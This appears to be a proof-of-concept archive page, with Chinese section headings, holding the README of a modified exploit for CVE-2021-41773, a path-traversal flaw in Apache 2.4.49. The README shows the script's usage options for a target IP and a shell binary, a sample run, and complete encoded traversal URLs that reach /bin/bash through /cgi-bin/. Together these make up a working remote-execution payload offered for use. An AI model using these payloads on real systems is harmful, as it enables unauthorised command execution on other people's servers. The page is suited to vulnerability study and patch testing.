来源

关联漏洞

描述

CVE-2021-41773 Gaurav Raj's exploit modified by Plunder

介绍

# CVE-2021-41773 ( Apache / 2.4.49 )
CVE-2021-41773 exploit by Gaurav Jav modified by Plunder in order to use custom exploit


Usage :

``` 
$ py exploit.py -h                              
usage: exploit.py [-h] -t TARGET [-b BINARY]

Apache2 2.4.49 Exploit

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Specify the target IP or Domain. eg: 127.0.0.1 or example.com
  -b BINARY, --binary BINARY
                        Specify the binary file to execute. eg: /bin/sh (/bin/sh by default)
```

exemple :

```
PS C:\Users\Mateo\Downloads\Apache 2.4.49 -- exploit kit> py exploit.py -t <ip> -b /bin/bash 
--------------------------------------------------------------------------------------------
|                                  Apache2 2.4.49 - Exploit                                |
|                                            Author : Gaurav Raj                           |
|                                            Modified by : Plunder                         |
--------------------------------------------------------------------------------------------

url : <ip>
binary used : /bin/bash
http path traversal url : http://<ip>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash
https path traveral url (relative): https://<ip>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash

>>> 
```

Gurav Jave project : https://github.com/thehackersbrain/CVE-2021-41773

文件快照

 [4.0K]  /data/pocs/53c32b3403eee9a7a37cc86c74ddadb8e6b0eab7
├── [2.7K]  exploit.py
└── [1.5K]  README.md

0 directories, 2 files

备注